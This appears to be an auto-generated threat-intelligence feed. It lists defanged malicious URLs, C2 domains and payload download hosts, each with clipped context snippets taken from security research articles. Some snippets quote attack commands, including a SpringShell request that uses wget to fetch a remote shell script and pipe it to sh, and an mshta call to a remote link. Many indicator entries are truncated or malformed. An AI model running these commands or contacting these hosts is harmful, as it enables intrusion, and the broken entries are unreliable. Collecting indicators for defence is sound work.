ZeroHour

Indicators of compromise

93 indicators auto-extracted from article text · hashes, IPs, domains, URLs · verify before use

TypeIndicatorContextArticleFirst seen
urlhttp://[0000:0000:0000:0000:0000:FFFF:67C1:B3DF[.]com domain, the message embedded an IPv6-mapped address: hxxp://[0000:0000:0000:0000:0000:FFFF:67C1:B3DF]/11881659 . That notation represents IPv4 address 103[.]193Phishing Attacks Abuse Trusted Email Infrastructure and URL Cloaking to Evade Security Filters
GBHackers
· 9h ago
urlhttp://[0000:0000:0000:0000:0000:FFFF:67C1:B3DFnder domain used in the Romanian banking phishing email URL hxxp://[0000:0000:0000:0000:0000:FFFF:67C1:B3DF]/11881659 IPv6-mapped IP-literal URL embedded in the bankinNew Phishing Attacks Use Trusted Email Infrastructure and URL Cloaking to Bypass Security Tools
Cyber Security News
· 10h ago
urlhttp://aa.amazingshield[per[.]info/aa.js Stage-three Node.js Insomnia RAT agent URL hxxp[:]//aa.amazingshield[.]xyz/33244556546.py Stage-three Python Insomnia RAT agentHackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker
Cyber Security News
· 1d ago
urlhttps://drelto[yz/33244556546.py Stage-three Python Insomnia RAT agent URL hxxps[:]//drelto[.]info/farlix Search-result injection script host Domain sHackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker
Cyber Security News
· 1d ago
urlhttps://stryper[sHelper\docro\ Docro Chrome extension installation path URL hxxps[:]//stryper[.]info/t.ps1 Stage-two PowerShell installer for Insomnia RHackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker
Cyber Security News
· 1d ago
urlhttps://archive[498752f735a1ca0987/{campaignId} .NET PE Injector sub-module hxxps://archive[.]org/download/hotelmoskva/hotelmoskva.jpg SentinelMemoryScaThe extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions
Elastic Security Labs
· 1d ago
urlhttps://connection[dpoint, passing the campaign ID. In this sample, the URL is hxxps://connection[.]upgradeonline[.]site . Loader beacons to C2 Second stage:The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions
Elastic Security Labs
· 1d ago
urlhttps://granderevolucao[r URL Malicious browser extension installer payload main-v2 hxxps://granderevolucao[.]store/5c92d3b8734b4f498752f735a1ca0987/{campaignId} .NET PThe extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions
Elastic Security Labs
· 1d ago
urlhttps://ia601808[er.exe : legit SentinelOne binary for side-loading sentinel hxxps://ia601808[.]us[.]archive[.]org/5/items/sentinel_20260722_0435/SentinelThe extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions
Elastic Security Labs
· 1d ago
urlhttps://volmira[intained. After retrieving the domains, the malware queries hxxps://volmira[.]site/api/ext/version to obtain the extension version. TheThe extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions
Elastic Security Labs
· 1d ago
urlhttps://zaviro[two C2 endpoints: hxxps://volmira[.]site//api/savecreds and hxxps://zaviro[.]online//api/v1/fingerprint . The following POST request waThe extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions
Elastic Security Labs
· 1d ago
urlhttp://www[attempting to download a page from the unregistered domain hxxp://www[.]creamp1eonlyfans[.]net . Because this domain should not reThe extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions
Elastic Security Labs
· 1d ago
urlhttps://proof.gitprogram[gleBamboo Phishing, exploit delivery, and C2 infrastructure hxxps://proof.gitprogram[.]com/a4/j8 URL JungleBamboo September 2 phishing URL servinChina-Linked Hackers Chain Chrome Zero-Day With Windows Kernel Flaw in Attacks
GBHackers
· 3d ago
urlhttps://apimantax[cted outbound traffic. Type Indicator Description C2 domain hxxps://apimantax[.]otax[.]fun Active command-and-control domain dynamically rNew Android Ransomware Records Screens, Steals OTPs and Secretly Takes Photos of Victims
Cyber Security News
· 4d ago
urlhttp://3.88.162[026-42018/CVE-2026-42016 exploitation 2026-09-06 2026-09-08 hxxp://3.88.162[.]79:36789/smtp Second-stage payload download URL 2026-09-07Hackers Exploit JFrog Artifactory Flaws to Bypass Authentication and Gain Admin Access
GBHackers
· 4d ago
urlhttp://log.gitclone[Actor IP exploiting CVE-2026-82329 2026-09-02 Not provided hxxp://log.gitclone[.]org:45678/smtp Payload download URL following CVE-2026-420Hackers Exploit JFrog Artifactory Flaws to Bypass Authentication and Gain Admin Access
GBHackers
· 4d ago
urlhttp://3.88.162[]6:8443 Payload URLs hxxp://log.gitclone[.]org:45678/smtp , hxxp://3.88.162[.]79:36789/smtp File / Hash /tmp/.z — 513a907b69edffc3cb77a4JFrog Artifactory Vulnerabilities Actively Exploited in the Wild to Gain Administrative Control
Cyber Security News
· 4d ago
urlhttp://log.gitclone[[.]88 , 137.184.111[.]69 , 64.207.232[.]6:8443 Payload URLs hxxp://log.gitclone[.]org:45678/smtp , hxxp://3.88.162[.]79:36789/smtp File / HaJFrog Artifactory Vulnerabilities Actively Exploited in the Wild to Gain Administrative Control
Cyber Security News
· 4d ago
urlhttps://apimantax[lution. Mantax OTAX Android Ransomware Zimperium identified hxxps://apimantax[.]otax[.]fun as a C2-related domain in its analysis and publMantax OTAX Android Ransomware Spies on Users, Steals OTPs and Encrypts Files
GBHackers
· 4d ago
urlhttp://3.88.162[026-42018/CVE-2026-42016 exploitation 2026-09-06 2026-09-08 hxxp://3.88.162[.]79:36789/smtp Second load of payload after CVE-2026-42018/Artifactory Under Attack: In-the-Wild Exploitation of CVE-2026-42016, CVE-2026-42018 & CVE-2026-82329
Wiz Blog
· 5d ago
urlhttp://log.gitclone[loiting CVE-2026-42018/CVE-2026-42016 2026-08-28 2026-09-07 hxxp://log.gitclone[.]org:45678/smtp Payload download after CVE-2026-42018/CVE-2Artifactory Under Attack: In-the-Wild Exploitation of CVE-2026-42016, CVE-2026-42018 & CVE-2026-82329
Wiz Blog
· 5d ago
urlhttps://stro7121.blob.core.windows[xe interpreter to download and execute a Python script from hxxps://stro7121.blob.core.windows[.]net/dpp1/config.py . SloppyRAT stager The config.py scriptSloppyRAT: A New Tool For Ransomware Attacks
Zscaler ThreatLabz
· 5d ago
urlhttp://167.148.195[172ec Brazilian financial campaign malware or tool hash URL hxxp[:]//167.148.195[.]53:8888/socktz_v9.exe Download location for SockTz versiHackers Use Claude and GPT-Powered Tools to Help Breach Government and Financial Networks
Cyber Security News
· 5d ago
urlhttp://45.142.193[ing followed by Base64 encoding using certutil Download URL hxxp://45.142.193[.]132:8000/lsa_collect.exe Download location for LSA bootkeyHackers Deploy Hundreds of AI Agents to Compromise 440 PaperCut Servers
GBHackers
· 5d ago
urlhttps://api-prod.secboxes[ad.secboxes[.]com:443/dist.zip URL Download URL August 2026 hxxps://api-prod.secboxes[.]com:443/download URL Download URL August 2026 hxxps://evidChina-Linked Hackers Exploit Chrome and Windows Zero-Days in BlueMoon Attacks
GBHackers
· 5d ago
urlhttps://download.secboxes[ecboxes[.]com/ChromeUpdate.exe URL Download URL August 2026 hxxps://download.secboxes[.]com:443/dist.zip URL Download URL August 2026 hxxps://api-China-Linked Hackers Exploit Chrome and Windows Zero-Days in BlueMoon Attacks
GBHackers
· 5d ago
urlhttps://evidence.msbenefit[od.secboxes[.]com:443/download URL Download URL August 2026 hxxps://evidence.msbenefit[.]com/msgbox.exe URL Download URL September 2026 hxxps://zkiChina-Linked Hackers Exploit Chrome and Windows Zero-Days in BlueMoon Attacks
GBHackers
· 5d ago
urlhttps://project.secboxes[n[.]com Hostname TA412 BlueMoon exploit page September 2026 hxxps://project.secboxes[.]com/ChromeUpdate.exe URL Download URL August 2026 hxxps://China-Linked Hackers Exploit Chrome and Windows Zero-Days in BlueMoon Attacks
GBHackers
· 5d ago
urlhttps://recommendation-letter.secboxes[ecboxes[.]com/ChromeUpdate.exe URL Download URL August 2026 hxxps://recommendation-letter.secboxes[.]com/ChromeUpdate.exe URL Download URL August 2026 hxxps://China-Linked Hackers Exploit Chrome and Windows Zero-Days in BlueMoon Attacks
GBHackers
· 5d ago
urlhttps://zki0y83.msbenefit[.msbenefit[.]com/msgbox.exe URL Download URL September 2026 hxxps://zki0y83.msbenefit[.]com:443/feed URL Download URL August 2026 extension-manageChina-Linked Hackers Exploit Chrome and Windows Zero-Days in BlueMoon Attacks
GBHackers
· 5d ago
urlhttps://kr[2 endpoint for the reverse TCP proxy PowerShell payload URL hxxps://kr[.]cedar2glanz[.]ru/jewel[.]js Secondary PowerShell payload fClearFake Deploys Crypto Stealer That Uses Vulnerable Driver to Kill EDR Security Tools
Cyber Security News
· 6d ago
urlhttps://phys[for the verification.google branch PowerShell download URL hxxps://phys[.]stunned-amniotic[.]com/hub[.]log ZIP payload retrieved byClearFake Deploys Crypto Stealer That Uses Vulnerable Driver to Kill EDR Security Tools
Cyber Security News
· 6d ago
urlhttps://telegra[loader observed at the Ukrainian organization Dead-drop URL hxxps://telegra[.]ph/Functions-04-03 Public page used by the Amatera branchClearFake Deploys Crypto Stealer That Uses Vulnerable Driver to Kill EDR Security Tools
Cyber Security News
· 6d ago
urlhttps://146[s. The initial stager downloads a second-stage payload from hxxps://146[.]103[.]99[.]177:8443/0c5b76709523, decodes it, and XOR-decrHackers Exploit Critical FortiGate Flaw to Deploy AI-Assisted PivotC2 RAT
GBHackers
· 6d ago
urlhttps://<account-id>.acemlnd[s do not point at the brand domain at all – they look like: hxxps://<account-id>.acemlnd[.]com/<tracking-token> hxxps://<brand-subdomain>.activehosteASCII smuggling crosses over from AI prompt injection to phishing evasion
Microsoft Security Blog
· 12d ago
urlhttps://<brand-subdomain>.activehosted[k like: hxxps://<account-id>.acemlnd[.]com/<tracking-token> hxxps://<brand-subdomain>.activehosted[.]com/<tracking-token> Most of the flagged messages carriedASCII smuggling crosses over from AI prompt injection to phishing evasion
Microsoft Security Blog
· 12d ago
urlhttp://167.148.195[a2cf34f0af1afe161f123a3d200e77f6c6f41b81bf6ae66ee172ec URL: hxxp[:]//167.148.195[.]53:8888/socktz_v9.exe Additional Resources Operation EscAttackers Expose Ongoing AI Tool Use Targeting Organizations in Latin America
Palo Alto Unit 42
· 12d ago
urlhttp://www.gehie246[e indicators of compromise below. kaspersky-lab[.]hl[.]cn → hxxp://www.gehie246[.]com/712down pc-razerzone[.]com[.]cn → hxxp://www.gehie246[Counterfeit installers to system compromise: Tracking a deceptive software download campaign
Microsoft Security Blog
· 13d ago
urlhttps://sistema-ekg3h4htc0h0ggdh.canadacentral-01.azurewebsites[684.BPSE.CONTRATOS.DIGITAIS.pdf Link from the message text: hxxps[:]//sistema-ekg3h4htc0h0ggdh.canadacentral-01.azurewebsites[.]net/ Downloaded zip archive and extracted Windows shortcGuildma (Astaroth) malware infection from Brazilian Portuguese email, (Tue, Sep 1st)
SANS Internet Storm Center
· 14d ago
urlhttp://webhook[o contains a hidden image referencing a remote webhook URL: hxxp://webhook[.]site/62114596-33f5-47fb-9012-0223529e5a13/docopened[.]jpg.Russian APT BlueDelta Uses HOOKEDGE to Target Defense and Diplomatic Organizations
Security Affairs
· 18d ago
urlhttp://159.89.156[Domains and URLs: hxxp://y.fd6fq54s6df541q23sdxfg[.]eu/nvr hxxp://159.89.156[.]190/.y/pty1 hxxp://159.89.156[.]190/.y/pty3 hxxp://159.89.Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices
Palo Alto Unit 42
· 27d ago
urlhttp://165.227.78[nv : Body > < / soapenv : Envelope > We think that this URL hxxp://165.227.78[.]159/wl.php is used for the reporting purpose. Because, theMuhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices
Palo Alto Unit 42
· 27d ago
urlhttp://y.fd6fq54s6df541q23sdxfg[.233[.]35 68.66.253[.]100 185.61.149[.]22 Domains and URLs: hxxp://y.fd6fq54s6df541q23sdxfg[.]eu/nvr hxxp://159.89.156[.]190/.y/pty1 hxxp://159.89.156[.Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices
Palo Alto Unit 42
· 27d ago
urlhttp://192.168.0[ted a session token that is reflected in the following URL: hxxp[:]//192.168.0[.]1/WCYCPJQAHXBRCQSC/userRpm/Index.htm As the session tokeA Deep Dive Into Attempted Exploitation of CVE-2023
Palo Alto Unit 42
· 27d ago
urlhttp://127.0.0[CHANNEL #tuxbot TABLE_IRC_NICK_PREFIX tux TABLE_HTTP_C2_URL hxxp[:]//127.0.0[.]1/cmd TABLE_THINKPHP_PAYLOAD Full HTTP GET request (312TuxBot v3: Inside an IoT Botnet Framework With LLM
Palo Alto Unit 42
· 27d ago
urlhttp://feed43[rvers 185.203.118[.]115 94.156.35[.]204 Dead Drop Resolvers hxxp://feed43[.]com/8166706728852850.xml hxxp://feed43[.]com/3210021137734Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent
Palo Alto Unit 42
· 29d ago
urlhttp://feeds.rapidfeeds[622.xml hxxp://www.webrss[.]com/createfeed.php?feedid=49966 hxxp://feeds.rapidfeeds[.]com/88604/ Script to Decrypt Dead Drop Resolvers 1 2 3 4 5Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent
Palo Alto Unit 42
· 29d ago
urlhttp://www.webrss[66706728852850.xml hxxp://feed43[.]com/3210021137734622.xml hxxp://www.webrss[.]com/createfeed.php?feedid=49966 hxxp://feeds.rapidfeeds[.]Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent
Palo Alto Unit 42
· 29d ago
urlhttps://bjm9.blogspot[WildFire's analysis, the shortened bit.ly URL redirected to hxxps://bjm9.blogspot[.]com/p/si.html , as seen in the “Location” field of the HTTAggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign
Palo Alto Unit 42
· 29d ago
urlhttps://pastebin[n to download a script from a Pastebin URL, specifically at hxxps://pastebin[.]com/raw/tb5gHu2G that we will continue to refer to as theAggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign
Palo Alto Unit 42
· 29d ago
urlhttps://static.wixstatic[t’s footer that attempts to load a remote OLE document from hxxps://static.wixstatic[.]com/ugd/05e470_b104c366c1f7423293887062c7354db2.doc : FiguAggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign
Palo Alto Unit 42
· 29d ago
urlhttp://www.bitly[nd execute the following URL via the "Shell" command: mshta hxxp://www.bitly[.]com/SmexEaldos3 The command above uses the built-in “mshtaAggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign
Palo Alto Unit 42
· 29d ago
urlhttp://163.123.143[and executed, to accommodate different Linux architectures: hxxp://163.123.143[.]126/bins/dark.x86 hxxp://163.123.143[.]126/bins/dark.mipsOld Wine in the New Bottle: Mirai Variant Targets Multiple IoT Devices
Palo Alto Unit 42
· 29d ago
urlhttp://212.192.241[ng more shell script downloaders: hxxp://2.56.59[.]215/i.sh hxxp://212.192.241[.]72/lolol.sh Figure 2 is a diagram illustrating the campaigOld Wine in the New Bottle: Mirai Variant Targets Multiple IoT Devices
Palo Alto Unit 42
· 29d ago
urlhttp://2.56.59[s and found two URLs hosting more shell script downloaders: hxxp://2.56.59[.]215/i.sh hxxp://212.192.241[.]72/lolol.sh Figure 2 is a diOld Wine in the New Bottle: Mirai Variant Targets Multiple IoT Devices
Palo Alto Unit 42
· 29d ago
urlhttp://31.210.20[URLs in the malware samples that hosted two shell scripts: hxxp://31.210.20[.]100/lolol[.]sh hxxp://212.192.241[.]72/lolol[.]sh The shelOld Wine in the New Bottle: Mirai Variant Targets Multiple IoT Devices
Palo Alto Unit 42
· 29d ago
urlhttp://185.225.74[g bot clients to accommodate different Linux architectures: hxxp://185.225.74[.]251/armv4l hxxp://185.225.74[.]251/armv5l hxxp://185.225.7IoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits
Palo Alto Unit 42
· 29d ago
urlhttp://zvub[o download a shell script downloader as a file named y from hxxp://zvub[.]us/ . If executed, the shell script downloader would downlIoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits
Palo Alto Unit 42
· 29d ago
urlhttp://games.my-homeip[the RC4 cipher with the same key “78563412”. It connects to hxxp://games.my-homeip[.]com:443/ks8d[ip address]akspbu.txt by using the HTTP POSTBisonal Malware Used in Attacks Against Russia and South Korea
Palo Alto Unit 42
· 29d ago
urlhttp://178.16.54[th several malware samples (e.g., the binary retrieved from hxxp[:]//178.16.54[.]109/st.exe ) associated with Phorpiex (aka Trik), a longAlmost Half of Malware Samples Communicate Direct to IP
Palo Alto Unit 42
· 29d ago
urlhttp://139.155.2[ava class file from a remote server. The EvilObj.class from hxxp://139.155.2[.]105:8081 contains the decompiled Java code as seen in FiguAnother Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021
Palo Alto Unit 42
· 29d ago
urlhttp://150.60.139[s and execute them. The first file downloaded was hosted at hxxp://150.60.139[.]51:80/wp-content/themes/twentyseventeen/s.cmd , which contAnother Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021
Palo Alto Unit 42
· 29d ago
urlhttp://161.35.184[e above, the server would download a Java class file from a hxxp://161.35.184[.]54:9998/V8.class URL, which responds with a Java class filAnother Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021
Palo Alto Unit 42
· 29d ago
urlhttp://165.22.2[that provides the Java class that installs a coinminer. The hxxp://165.22.2[.]186:80/wp-content/themes/twentyseventeen/Exploit.class resAnother Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021
Palo Alto Unit 42
· 29d ago
urlhttp://2.57.121[cessing this URL, the server would access a Java class from hxxp://2.57.121[.]36/Rjava.class , which contained the decompiled code seenAnother Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021
Palo Alto Unit 42
· 29d ago
urlhttp://68.183.165[ommand attempts to download and execute an application from hxxp://68.183.165[.]105:80/wp-content/themes/twentyseventeen/xmrig64.exe , whiAnother Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021
Palo Alto Unit 42
· 29d ago
urlhttp://[hostnameThe HTTP POST requests would be sent to the following URLs: hxxp://[hostname].[username]8.pef.mur.1ma[.]xyz/ hxxp://[hostname].[usernameAnother Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021
Palo Alto Unit 42
· 29d ago
urlhttps://[hostname[.]xyz/ hxxp://[hostname].[username]5.pef.mur.1ma[.]xyz:53/ hxxps://[hostname].[username]4.pef.mur.1ma[.]xyz/ The DNS tunneling involvesAnother Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021
Palo Alto Unit 42
· 29d ago
urlhttps://cdn.discordapp[cious. The hosted file is retrieved from the following URL: hxxps://cdn.discordapp[.]com/attachments/928503440139771947/930108637681184768/TbopThreat Brief: Ongoing Russia and Ukraine Cyber Activity
Palo Alto Unit 42
· 29d ago
urlhttps://akamaitechcloudservices[d4c310c262a88896c57bbe3b6456bd090 icon10.ico and icon11.ico hxxps://akamaitechcloudservices[.]com/v2/storage d51a790d187439ce030cf763237e992e9196e9aa417Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated)
Palo Alto Unit 42
· 29d ago
urlhttps://azuredeploystore[74e059cf1720d77c47b97d97c3b0cf43ade5d96bf724639bd icon4.ico hxxps://azuredeploystore[.]com/cloud/services c13d49ed325dec9551906bafb6de9ec947e5ff9Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated)
Palo Alto Unit 42
· 29d ago
urlhttps://azureonlinestorage[030cf763237e992e9196e9aa41797a94956681b6279d1b9a icon12.ico hxxps://azureonlinestorage[.]com/azure/storage 4e08e4ffc699e0a1de4a5225a0b4920933fbb9cfThreat Brief: 3CXDesktopApp Supply Chain Attack (Updated)
Palo Alto Unit 42
· 29d ago
urlhttps://glcloudservice[f1d0f17e0242efd78fd4ed0c344ac6469611ec72defa6b2d icon14.ico hxxps://glcloudservice[.]com/v1/console f47c883f59a4802514c57680de3f41f690871e26f25Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated)
Palo Alto Unit 42
· 29d ago
urlhttps://msedgepackageinfo[de4a5225a0b4920933fbb9cf123cde33e1674fde6d61444f icon13.ico hxxps://msedgepackageinfo[.]com/microsoft-edge 8c0b7d90f14c55d4f1d0f17e0242efd78fd4ed0Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated)
Palo Alto Unit 42
· 29d ago
urlhttps://msstorageazure[e0a2b07bf4771e897fb5a617998aa4876e0e1baa5fbb8e25c icon1.ico hxxps://msstorageazure[.]com/window d459aa0a63140ccc647e9026bfd1fccd4c310c262a88896Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated)
Palo Alto Unit 42
· 29d ago
urlhttps://msstorageboxes[551906bafb6de9ec947e5ff936e7e40877feb2ba4bb176396 icon5.ico hxxps://msstorageboxes[.]com/office f1bf4078141d7ccb4f82e3f4f1c3571ee6dd79b5335eb0eThreat Brief: 3CXDesktopApp Supply Chain Attack (Updated)
Palo Alto Unit 42
· 29d ago
urlhttps://officeaddons[b4f82e3f4f1c3571ee6dd79b5335eb0e0464f877e6e6e3182 icon6.ico hxxps://officeaddons[.]com/technologies 2487b4e3c950d56fb15316245b3c51fbd70717838Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated)
Palo Alto Unit 42
· 29d ago
urlhttps://officestoragebox[68b769f333a48e228c32bcf26bd98e51310efd48e80c1789f icon2.ico hxxps://officestoragebox[.]com/api/session 268d4e399dbbb42ee1cd64d0da72c57214ac987efbThreat Brief: 3CXDesktopApp Supply Chain Attack (Updated)
Palo Alto Unit 42
· 29d ago
urlhttps://pbxcloudeservices[0024533510ce22d71e05b20bad74d53fae158dc752a65782e icon9.ico hxxps://pbxcloudeservices[.]com/phonesystem Table 1. Icon files hosted at GitHub accouThreat Brief: 3CXDesktopApp Supply Chain Attack (Updated)
Palo Alto Unit 42
· 29d ago
urlhttps://pbxsources[14c57680de3f41f690871e26f250c6e890651ba71027e4d3 icon15.ico hxxps://pbxsources[.]com/exchange 2c9957ea04d033d68b769f333a48e228c32bcf26bd98eThreat Brief: 3CXDesktopApp Supply Chain Attack (Updated)
Palo Alto Unit 42
· 29d ago
urlhttps://raw.githubusercontent[name includes a randomly generated number between 1 and 15: hxxps://raw.githubusercontent[.]com/IconStorages/images/main/icon[1-15].ico This request lThreat Brief: 3CXDesktopApp Supply Chain Attack (Updated)
Palo Alto Unit 42
· 29d ago
urlhttps://sourceslabs[fb15316245b3c51fbd70717838f6f82f32db2efcc4d9da6de icon7.ico hxxps://sourceslabs[.]com/downloads e059c8c8b01d6f3af32257fc2b6fe188d5f4359c308bThreat Brief: 3CXDesktopApp Supply Chain Attack (Updated)
Palo Alto Unit 42
· 29d ago
urlhttps://visualstudiofactory[ee1cd64d0da72c57214ac987efbb509c46cc57ea6b214beca icon3.ico hxxps://visualstudiofactory[.]com/workload c62dce8a77d777774e059cf1720d77c47b97d97c3b0cfThreat Brief: 3CXDesktopApp Supply Chain Attack (Updated)
Palo Alto Unit 42
· 29d ago
urlhttps://zacharryblogs[af32257fc2b6fe188d5f4359c308b3684b1e0db2071c3425c icon8.ico hxxps://zacharryblogs[.]com/feed d0f1984b4fe896d0024533510ce22d71e05b20bad74d53faeThreat Brief: 3CXDesktopApp Supply Chain Attack (Updated)
Palo Alto Unit 42
· 29d ago
urlhttp://107.174.133[atwar.jsp?pwd=j&cmd=/bin/sh/-c${IFS}'cd${IFS}/tmp;wget${IFS}hxxp://107.174.133[.]167/t.sh${IFS}-O-%a6sh${IFS}SpringCore;' Upon further analCVE-2022-22965: Spring Core Remote Code Execution Vulnerability Exploited In the Wild (SpringShell) (Updated)
Palo Alto Unit 42
· 29d ago
urlhttp://checkblacklistwords[e PoC code to GitHub. However, the HTTP response to the URL hxxp://checkblacklistwords[.]eu/ has a Last-Modified field that is set to Sun, 16 Jul 2Fake CVE-2023
Palo Alto Unit 42
· 29d ago
urlhttp://154[n IDs targeted by the Chrome “auto” modes. UPLOAD0623URL = "hxxp://154[.]58[.]204[.]15:8080" # Change to your server MAX0623SLEEP =PurpleBravo’s Targeting of the IT Software Supply Chain
Recorded Future
· Jul 22, 2026
urlhttp://endpoint-api-v1[t downloads the payload disk image over cleartext HTTP from hxxp://endpoint-api-v1[.]com/d/f1b24e/download , retrying up to three times, and saCrashStealer: New macOS Infostealer Uses Signed Apps to Evade Gatekeeper
Security Affairs
· Jul 14, 2026
urlhttps://iplogger[r, a legitimate visitor-tracking service. The specific URL, hxxps://iplogger[.]com/mnWD, appeared across multiple distinct payloads spannFake VPN and 7-Zip Apps Turn Victims Into Residential Proxy Nodes
Security Affairs
· Jul 9, 2026
urlhttp://45.131.66[ion) Command-and-control: 45.131.66[.]106, with a beacon to hxxp://45.131.66[.]106:4444/beacon every 30 minutes Claimed staging server: 6AI Agent Exploits Langflow RCE to Automate Database Ransomware Attack
The Hacker News
· Jul 2, 2026
urlhttps://continuetogo[itten, TA453, and APT42 (along with its forerunner UNC788). hxxps[:]//continuetogo[.]me/Sec=Tab=settings/id=xxxxx=xxxxx/continue-to-settings.Suspected Iran-Nexus TAG-56 Uses UAE Forum Lure for Credential Theft Against US Think Tank
Recorded Future
· Jun 23, 2026
urlhttps://mailer-daemon[me/Sec=Tab=settings/id=xxxxx=xxxxx/continue-to-settings.php hxxps[:]//mailer-daemon[.]net/file=sharing=system/file.id.X=xxxxxx/continue-to-setSuspected Iran-Nexus TAG-56 Uses UAE Forum Lure for Credential Theft Against US Think Tank
Recorded Future
· Jun 23, 2026
urlhttps://tinyurl[a412201039105d86 2d5f2bf12085d41cb18a933 98afef0be8dfb9c229 hxxps[:]//tinyurl[.]ink/8tio97cy/Iran%20nuke.docx 28 February 2022 Table 2:Suspected Iran-Nexus TAG-56 Uses UAE Forum Lure for Credential Theft Against US Think Tank
Recorded Future
· Jun 23, 2026

Extraction is regex-based (SHA-256/SHA-1/MD5, public IPv4, defanged hxxp/[.] indicators, and bare domains/emails only from malware, actor, exploit, phishing, ransomware and breach articles with a nearby indicator context word). Treat confidence as low until you verify against the source article.